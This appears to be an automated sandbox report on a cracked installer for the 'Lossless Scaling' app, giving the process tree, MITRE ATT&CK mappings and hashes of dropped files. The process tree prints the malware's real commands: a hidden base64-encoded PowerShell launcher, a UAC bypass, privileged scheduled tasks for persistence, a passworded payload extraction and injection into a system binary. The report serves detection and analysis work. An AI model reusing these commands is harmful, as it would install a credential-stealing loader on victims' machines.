        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:4888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""E:\Registration (Crack)\Crack.bat" "
1⤵
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:5004
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2480
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:3316
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$b='"cG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSBsYW5ndWFnZS93aW5feC5wczE="';Invoke-Expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b)))"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File language/win_x.ps1
    3⤵
    - UAC bypass
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Program Files directory
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:552
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" ADD HKCU\SOFTWARE\Valve\Steam\Apps\993090 /v Installed /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:4904
  - - C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe
      "C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies Control Panel
      Suspicious use of SetWindowsHookEx
      PID:328
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /query /tn administrator
      4⤵
      PID:4804
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /query /tn Backup1
      4⤵
      PID:3304
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /tn Backup1 /sc minute /mo 30 /tr C:\Users\Public\IObitUnlocker\Backup.vbs /rl HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1224
  - - C:\Users\Public\IObitUnlocker\RAR.exe
      "C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\
      4⤵
      Executes dropped EXE
      PID:1032
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"
      4⤵
      PID:1148
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4620
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1560
      - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /query /tn administrator
        6⤵
        
        PID:964
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Backup.vbs"
      4⤵
      PID:932
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3344
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4888
      - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /query /tn administrator
        6⤵
        
        PID:4756
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /query /tn Backup1
      4⤵
      PID:1224
  - - C:\Windows\system32\Dism.exe
      "C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx3
      4⤵
      Drops file in Windows directory
      Suspicious use of AdjustPrivilegeToken
      PID:3000
    - - C:\Users\Admin\AppData\Local\Temp\413055A8-E512-4D32-8BBB-01BE37C66396\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\413055A8-E512-4D32-8BBB-01BE37C66396\dismhost.exe {568AB3C0-E476-4622-BD89-EEB9CB2F381E}
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Windows directory
        
        PID:1088

C:\Windows\regedit.exe
"regedit.exe" "E:\Registration (Crack)\Double-click, confirm to merge, done.reg"
1⤵
- Runs .reg file with regedit
PID:2812

\??\E:\lossless scaling.exe
"E:\lossless scaling.exe"
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""E:\install + Crack.bat" "
1⤵
- Enumerates connected drives
PID:4688
- C:\Windows\system32\net.exe
  net session
  2⤵
  PID:1504
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:3624
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$b='"cG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSBsYW5ndWFnZS93aW5feC5wczE="';Invoke-Expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b)))"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File language/win_x.ps1
    3⤵
    - UAC bypass
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Program Files directory
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1964
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" ADD HKCU\SOFTWARE\Valve\Steam\Apps\993090 /v Installed /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:2464
  - - C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe
      "C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies Control Panel
      Suspicious use of SetWindowsHookEx
      PID:404
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /query /tn administrator
      4⤵
      PID:4496
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /query /tn Backup1
      4⤵
      PID:396
  - - C:\Users\Public\IObitUnlocker\RAR.exe
      "C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\
      4⤵
      Executes dropped EXE
      PID:5016
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"
      4⤵
      PID:3056
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:4936
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:772
      - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /query /tn administrator
        6⤵
        
        PID:404
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Backup.vbs"
      4⤵
      PID:2056
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2092
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4360
      - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /query /tn administrator
        6⤵
        
        PID:3008
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /query /tn Backup1
      4⤵
      PID:2244
  - - C:\Windows\system32\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /create /tn administartor /SC minute /MO 2 /tr C:\Users\Public\IObitUnlocker\Loader.vbs /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4856

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Lossless Scaling\Lan.vbs

Filesize
432B

MD5
49af07d132592c9a62eaaef421e3e589

SHA1
cb7cc0a4a492dba5773506e816467975cabdc227

SHA256
487985d63734cd4828eaf03284e0d1d2fa684afc2d46da489c99d498f31a83ab

SHA512
7525522f2b648aaf94e52fd1c1787931c11ca03e656ccbcca5879d6132d383aa40228256cbf93d0e7741f0003de6fe94ca537151a2162d33c077943b90fe5908

Download Submit
C:\Program Files (x86)\Lossless Scaling\Licenses.txt

Filesize
16KB

MD5
f803d675b73460adf21f4fbc31d8d5d8

SHA1
e8c43c839b6ca5ce1185fd47187e1c59e2673faa

SHA256
2696aab3218d13e02ea6541f14f77cfc6412c4f065db04dafbe4ed11673931dd

SHA512
66e0b9e921e0f602b0c2ea3d55bd843dbe2a1e58fc24f1da0dec7d6803d3f249f8ee74df503bfc3e7adf15460a338b4099d1c07a218070099152dde6c319136b

Download Submit
C:\Program Files (x86)\Lossless Scaling\Lossless.dll

Filesize
4.3MB

MD5
7969a2cbc4c31ccfb1ab8213f19501b9

SHA1
06a24af6e922ba2cd7fccb76ce2f43271a9af8b6

SHA256
486a48562504a274e984599a5931de200ea73bf6bc4c83bf6ca8daa651e80a68

SHA512
935988a39c1af479e971850f6758ee94098b35f173da609206312deeabeb3bc9466f93d1dad4e6d7938235f65fc52fdbd56058d46c1ba775d31718358eb6d8fa

Download Submit
C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe

Filesize
953KB

MD5
2c98d33096e97094cbbbd19f27f40883

SHA1
7e28af9d119d2658f962e3b28140c6081be1612b

SHA256
010ac1120a88a772e87d9e9018aa5db034a9bac9399803d4a7c4db3c47a71df6

SHA512
f9070ad6b2e3295fdde13aa8d7486147a7f9a675a924ad3bf117479baf5b573cf92650199e58378dd8345a28ab890bbd5021d374030c24836bfa65bb037dddc7

Download Submit
C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe.config

Filesize
174B

MD5
2a2df45a07478a1c77d5834c21f3d7fd

SHA1
f949e331f0d75ba38d33a072f74e2327c870d916

SHA256
051099983b896673909e01a1f631b6652abb88da95c9f06f3efef4be033091fa

SHA512
1a6dd48f92ea6b68ee23b86ba297cd1559f795946ecda17ade68aea3dda188869bba380e3ea3472e08993f4ae574c528b34c3e25503ee6119fd4f998835e09d7

Download Submit
C:\Program Files (x86)\Lossless Scaling\ar\LosslessScaling.resources.dll

Filesize
24KB

MD5
ed6f1b887abd06c83ecb9c6ad4b6ddae

SHA1
595f4748ee9f088d6c87281ba822c2e023cea9f2

SHA256
e078d3fe1e5c3ef3ae5a22da414b33d29c3ae335397fd699a35f0b767e20ab29

SHA512
c16bb876c0c6bf5f016a476649c4f99aa7a8679fbc7d356f33d13b65667878369a8aeadd010f828650385ce7783226505219a3b6adba22e33cbf30bcb706fcd0

Download Submit
C:\Program Files (x86)\Lossless Scaling\cs\LosslessScaling.resources.dll

Filesize
20KB

MD5
daa100df6e6711906b61c9ab5aa16032

SHA1
963ff6c2d517d188014d2ef3682c4797888e6d26

SHA256
cc61635da46b2c9974335ea37e0b5fd660a5c8a42a89b271fa7ec2ac4b8b26f6

SHA512
548faee346d6c5700bb37d3d44b593e3c343ca7dc6b564f6d3dc7bd5463fbb925765d9c6ea3065bf19f3ccf7b2e1cb5c34c908057c60b62be866d2566c0b9393

Download Submit
C:\Program Files (x86)\Lossless Scaling\de\LosslessScaling.resources.dll

Filesize
18KB

MD5
bea43c84cdc466ddea1398d4026c3ef9

SHA1
737b176c58d870acb9383b11c8d553c064ec2aff

SHA256
7bdb17bfa2e73143efcd5bdaf089a2127c6175daf0ced23c9c4102011d09a89a

SHA512
b9bbf206baef969d3960e9fa56b7edc320351698f66893dfa42897a7350e4e9d575e8cc4205ae28f2b8946d0f7f48fa2a550a30e7454423ec9d3812f5cb026e3

Download Submit
C:\Program Files (x86)\Lossless Scaling\fr\LosslessScaling.resources.dll

Filesize
21KB

MD5
29a5987145f5dcfd2963817c73b1e116

SHA1
bd046232e38f76b3ffcd4cb0b701e7e13b571192

SHA256
98aa85556c7b888bbe0ed12839fca9bd73c0f02ea1a93ae0985aadc157346a61

SHA512
cb27fc2771c481d774a4985e5911c26a877775db9f6b02b853584ddfeb70a39b929bfdccc7e63e65806974e3450c6dcaceab3db6766aee3de26466b9d5000c4b

Download Submit
C:\Program Files (x86)\Lossless Scaling\he\LosslessScaling.resources.dll

Filesize
22KB

MD5
854559ce6f1a4172247402bcb7ba6d6f

SHA1
3d999b3f8d9125ac619d3029b49e5a185370578a

SHA256
4edec52a80b6f695343c617813b9d94260b1a31d02809d1055774da5ac4943a3

SHA512
7fa81a302da4b99fe7ad446893dc90da710fe918b9934642ee2a66323fabdec562b0eb1bfc21070df11a7eb040f74d961090bbf040b4c38c8b86c7917aa5ca99

Download Submit
C:\Program Files (x86)\Lossless Scaling\hr\LosslessScaling.resources.dll

Filesize
19KB

MD5
ba84b335d4991ee1c52a6bf85e1a2fa5

SHA1
25e524a30249a930faa0932b3a2d1d52b4a75f61

SHA256
f0658c57595b27e93ffe8d797172eb9931e4f3407b9b9f0d1abda112d6921453

SHA512
c8e09e219e070ccc6c4de2c98849f88869149d44b358d23b533291ee56b70ca265f9b34846dea3674e62a17fae38755e99c704448437830d90c820a8185e2f1a

Download Submit
C:\Program Files (x86)\Lossless Scaling\id\LosslessScaling.resources.dll

Filesize
19KB

MD5
e6198d50284fda094898d92cd867a2e5

SHA1
70c63146345ce060051ff66620fb8e64bbac19db

SHA256
c597b1b463b7cec49548fac00d7588c9652bb67cc2b1b0c88676bf8f1558571e

SHA512
82485d394fe06636933a9d5df895b38bfea1117307ea4c208e59177feb37db2bf19070dbaef3529f053fb2f13708c4648d9521fa31877e9c0f195138758ca256

Download Submit
C:\Program Files (x86)\Lossless Scaling\it\LosslessScaling.resources.dll

Filesize
20KB

MD5
4216eb3bcff34d8bf807ba9ae2329400

SHA1
9e3104f0caba8c9721720e24991e2ff767269fa6

SHA256
961fe22ac5b8226e13161868c2af0de3700a157b3ec14a8036e6c85f0c38e158

SHA512
d6551d03794594f9e9a602232d2ece63eb3ca26338949cc6684eefa1f2ddc9eb6fdd2a35b20410dd7978612d399ab882cc72ccd5b82097c9ce07b4ac7840fd72

Download Submit
C:\Program Files (x86)\Lossless Scaling\ja\LosslessScaling.resources.dll

Filesize
25KB

MD5
c7a79602e51c7d382027d9cc4f4d9765

SHA1
cbcdfd3cdad01eba053b0bb7251876e218011764

SHA256
a2596374f8b643e4e4ac7d722a8f7ac83f9d315ab45bfa61074bf874651471bb

SHA512
77020357d3ea423a4508b7219bd0406be95c3344859d3099c515e65b00c1e1a1e1b19b1114fad86c60531a5a1b3ff773169dea2c17d694fe4eda4ae52adf3025

Download Submit
C:\Program Files (x86)\Lossless Scaling\lt\LosslessScaling.resources.dll

Filesize
18KB

MD5
2474f6359b2686ebcc034214ecda6253

SHA1
a72a22c72ae8dad1aa559fec8606d75cd4896e58

SHA256
763e0f53f3cbb438b90fc14191d5d4a79fd1bd673004fdcb28cc8c3bb2837897

SHA512
173774423de3cb23d9fc856f7daa41ecea7b09cd0e03ebf06a0ea2319e1e55b82514a567ac96f8c03b52a98c84fa3c4c4e06a6ac437b047ba22bd98caddd8064

Download Submit
C:\Program Files (x86)\Lossless Scaling\pl\LosslessScaling.resources.dll

Filesize
20KB

MD5
204bb095c3b6f2dd1900864515cf4396

SHA1
2c9585abc0e7141a605a727482c13aebe9511e19

SHA256
84c89ef89af6099fa5b54e91e19c2e01c56ab0dc7c2cccc71a70465d1c0d5b0d

SHA512
f546de9e27330f040c39c87f298b0bf7da480593619a978ab060192a72c0920a39979317268b88ae06dcdc7245aff26d229a118efd8deebc02ce8e630f0cf4a9

Download Submit
C:\Program Files (x86)\Lossless Scaling\pt-BR\LosslessScaling.resources.dll

Filesize
20KB

MD5
b55ecbe34dbc613abfbdc8d57c2071b1

SHA1
1120bfc3fadab03e517f6bbc7f889ec3c5240572

SHA256
2a993509736e479192fab00b8891720cce160027c0b2d4f1de972418d63b32d0

SHA512
bb6caeb9e340c3c9f0915f55f39953d33ccc79fb5db89aa1bad8b2d19dfa59fed5bd156e7b1f440f48c2c0a37267da8cc9818f22912386221959f928ee7a4864

Download Submit
C:\Program Files (x86)\Lossless Scaling\pt-PT\LosslessScaling.resources.dll

Filesize
21KB

MD5
ab3cde5ecc06776aca93dde3736c0015

SHA1
b3ed86db4c026facc759185c02b62f2d4a20630d

SHA256
1cbda2b28cef36d4af5806d5f22bdbd68ef04beed390b17fdde5e59fdb1b54eb

SHA512
6c21c007ca3fad6e13baca82e04ea3b66db2c6cd698406dd6f03bf873beed9df885e88431c994e1047db42cab02278cc6cf03b28e3a85fdbe693780d77864e96

Download Submit
C:\Program Files (x86)\Lossless Scaling\sr-Latn\LosslessScaling.resources.dll

Filesize
19KB

MD5
582057f55647898e751a20e1800ee70b

SHA1
a57b958478eca835230fcec3391fb076e79c9611

SHA256
fef9fd58c457510844eecc4c6a868dbcb41855560301c4270c5478a9c64c3987

SHA512
17301d317e692fd66114742ea3e971214b8fab9932ac3ceeb555e57954115c14de3fa142fb1100d851d26839907218e5e3a7db30316059872ea9b296f20dabe0

Download Submit
C:\Program Files (x86)\Lossless Scaling\tr\LosslessScaling.resources.dll

Filesize
20KB

MD5
21a59e82a064b4c4ae687a1965762f57

SHA1
abd852cdb1d294a68e4bae8d1563d2954f98073a

SHA256
836579c9cbe44121211c074a99dadafa78cb8c3731ec2e4efc258368cae544df

SHA512
0027ae3ce2cddac83b64a4b7ca2d4ecbeebe3d5466ed7d94af020a80b6a11b14c0c55ba2af9dbdc3b6c290f38a72657e25761c5864a35fa54cc5b536bd1525d7

Download Submit
C:\Program Files (x86)\Lossless Scaling\uk\LosslessScaling.resources.dll

Filesize
27KB

MD5
0c56b088ea3b949f89d0a6aaedef544a

SHA1
9369c7278ec8bcc6c880d99194de09fc2bd4efbe

SHA256
0a182a88ffcf20dcc892515a01db9af1a707814b982b9c21e1d9b3b4b203ceef

SHA512
d0df988558a1c448f3350affa93ba07f98e8de0d06bbbb562164e4ce73b59fc2f68cdc28af2035a7593299be7d5dc3d008aaf9181d7dd3ef5c039a1523731996

Download Submit
C:\Program Files (x86)\Lossless Scaling\zh-CN\LosslessScaling.resources.dll

Filesize
17KB

MD5
adc7b1becdd2018221d87b7cf738d89d

SHA1
5bbd8784574e8ac60e6fec0413b02408bf55fb04

SHA256
7cbfbbb179dc77b97d6442ad947cd93a23a723900a5d15c0d905b2cd16faa243

SHA512
0e2e93afef64f35def8f72ef7df2e9c8ecba338928ddf02e0f8b2e8ee94c689679c8be86d0ee8ec9cb7faf592889a127c22eacd14dd21cf3b487ddd32f9b5495

Download Submit
C:\Program Files (x86)\Lossless Scaling\zh-TW\LosslessScaling.resources.dll

Filesize
17KB

MD5
37f6c40defabf6b52616e77e588efae4

SHA1
69b0ec19792a2367fc72b84721a78a99c18f9c95

SHA256
93e95c9831f8baa3d295f61172930951220e3cf881a85f51cb76e3727562ad53

SHA512
a306954a492ef89dad9d9b69cdc16234a35517f191ad67356558b6dba417656a0635b4aaee6ca2b985196c6d5141212138c2579b98cf2f08f11d4d5b8d1e0252

Download Submit
C:\Users\Admin\AppData\Local\Lossless Scaling\Settings.xml

Filesize
2KB

MD5
45fed0a3bcbc889ca99d0c5943210e7e

SHA1
602584366a413cb9ae459b6c3231190cd787241e

SHA256
9812fe8104a86e693d6baa02a4cdb56ea9a4aedb500b050346eb5ec6bda8dd09

SHA512
d0728fcce9484daedb2c9552ee2a818f7cccbeb1e9bca24a1c4fc1ca6e8c181c46cdc89670bfee3d6ad219ea6f69750bd03f776af4f9e4667872c66c11dbd255

Download Submit
C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\DismCorePS.dll

Filesize
200KB

MD5
7f751738de9ac0f2544b2722f3a19eb0

SHA1
7187c57cd1bd378ef73ba9ad686a758b892c89dc

SHA256
db995f4f55d8654fc1245da0df9d1d9d52b02d75131bc3bce501b141888232fc

SHA512
0891c2dedb420e10d8528996bc9202c9f5f96a855997f71b73023448867d7d03abee4a9a7e2e19ebe2811e7d09497bce1ea4e9097fcb810481af10860ff43dfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\DismHost.exe

Filesize
168KB

MD5
17275206102d1cf6f17346fd73300030

SHA1
bbec93f6fb2ae56c705efd6e58d6b3cc68bf1166

SHA256
dead0ebd5b5bf5d4b0e68ba975e9a70f98820e85d056b0a6b3775fc4df4da0f6

SHA512
ce14a4f95328bb9ce437c5d79084e9d647cb89b66cde86a540b200b1667edc76aa27a36061b6e2ceccecb70b9a011b4bd54040e2a480b8546888ba5cc84a01b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\DismProv.dll

Filesize
292KB

MD5
2ac64cc617d144ae4f37677b5cdbb9b6

SHA1
13fe83d7489d302de9ccefbf02c7737e7f9442f9

SHA256
006464f42a487ab765e1e97cf2d15bfa7db76752946de52ff7e518bc5bbb9a44

SHA512
acdb2c9727f53889aa4f1ca519e1991a5d9f08ef161fb6680265804c99487386ca6207d0a22f6c3e02f34eaeb5ded076655ee3f6b4b4e1f5fab5555d73addfd7

Download Submit
C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\ImagingProvider.dll

Filesize
248KB

MD5
4c6d681704e3070df2a9d3f42d3a58a2

SHA1
a9f6286ac25f17b6b2acd1fce6459b0bc94c6c81

SHA256
f1bbab35b2602d04d096c8de060b2a5cf802499a937fd1ffe749ff7f54852137

SHA512
daa0c723312680256c24457162e0ef026b753ba267f3e2755f838e2864a163802c078d8668dd2c2064cb8887f4e382a73d6402a5533b6ac5c3cbf662ad83db86

Download Submit
C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\LogProvider.dll

Filesize
108KB

MD5
c63f6b6d4498f2ec95de15645c48e086

SHA1
29f71180feed44f023da9b119ba112f2e23e6a10

SHA256
56aca41c62c8d0d1b26db3a01ef6c2da4a6a51fc963eb28411f8f7f029f1bfde

SHA512
3a634340d8c66cbc1bef19f701d8bdb034449c28afecce4e8744d18181a20f85a17af3b66c8853cecb8be53f69ae73f85b70e45deac29debab084a25eb3c69dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\OSProvider.dll

Filesize
180KB

MD5
e9833a54c1a1bfdab3e5189f3f740ff9

SHA1
ffb999c781161d9a694a841728995fda5b6da6d3

SHA256
ec137f9caebcea735a9386112cf68f78b92b6a5a38008ce6415485f565e5cf85

SHA512
0b18932b24c0257c80225c99be70c5125d2207f9b92681fd623870e7a62599a18fa46bcb5f2b4b01889be73aeb084e1b7e00a4968c699c7fdb3c083ef17a49f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\ServicingCommon.dll

Filesize
944KB

MD5
07231bdae9d15bfca7d97f571de3a521

SHA1
04aec0f1afcf7732bc4cd1f7aab36e460c325ba6

SHA256
be75afbbc30cad7235adf03dcc07fcee3c0c330c89b00e326ebbef2e57df5935

SHA512
2a46e0657e84481faf5c9d3de410884cb5c6e7b35039f5be04183cdac6c088cc42b12d0097e27836af14699e7815d794ca1cec80960833ab093b8dc6d44e2129

Download Submit
C:\Users\Admin\AppData\Local\Temp\B52360D2-7575-457F-A460-6E0975B83EA7\TransmogProvider.dll

Filesize
1.3MB

MD5
c1c56a9c6ea636dbca49cfcc45a188c3

SHA1
d852e49978a08e662804bf3d7ec93d8f6401a174

SHA256
b20b3eb2df22998fd7f9ff6898ba707d6b8833a8274719a5e09d5148d868faaf

SHA512
f6db05e4644d734f81c2461e4ad49c4e81880c9e4beee13dbbda923360ef6cf4821fccd9040671b86ab2cd8c85fc313c951c1a69e4df14d94268753ce7ae5b2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r5qycdzl.lnw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\Lossless Scaling.lnk

Filesize
1KB

MD5
ef4003d5449074011222ccbc5a2ebd84

SHA1
d72323ef0837450d73d35ceb4210565400f6d7db

SHA256
ca39a4436e43459d8d1a51f846794684be0ba38c3b1d1627d4276b453607c4bd

SHA512
8bd1211a0d902ecc42cfba7cd726860698e016eefab853a291dd073481b9ccd9e22c879de1c8b40b3b8901c54587e46cb762de6950aa364d30ba3b75c52e3766

Download Submit
C:\Users\Public\IObitUnlocker\Backup.ps1

Filesize
438KB

MD5
10b1e2cf2353b33fce64e3b1c106007b

SHA1
9c9406a0cd0014244a0c136dbbda40b3c7fa3e8c

SHA256
a0b96bc8b17dad2a6f387dea162c675a1afdf3efa13680a0d6bf5436fcf2b5bf

SHA512
17fba8613583161ec0d16b8466632a16ae63481f90177b12aeb492e0124fd6ee10bff7009c17ccb6a9ca1b02a324a19a3838b4ec7bf346a23b281488d2ec6e1e

Download Submit
C:\Users\Public\IObitUnlocker\Backup.vbs

Filesize
308B

MD5
59fca3c2fb6da0d16e0a280716e2f3ed

SHA1
dd01f82572e31875faa044c0152e48cc818ba5f3

SHA256
55e4fbd4febcf1db761a8f8732484998993b439bae2200f982d81ed35d55265d

SHA512
47caacc37ec8ae4c13120f713a35282da72e50dc7d2cdc6c50b1f96a07626d5db9e8c6d5822d8810c7a5096c476e737d8f7845e6fce23bbf39df7cad52938883

Download Submit
C:\Users\Public\IObitUnlocker\Devn.exe

Filesize
7KB

MD5
857f8a07b6c9ad9bd3bb6e4c047fee45

SHA1
c2ded9a18bdb6cd2842db08354600a97cf90e032

SHA256
7083023d5ba4768a6398a92dfc6f8a7556efbeafb6a4d60347aea0f69b2e89af

SHA512
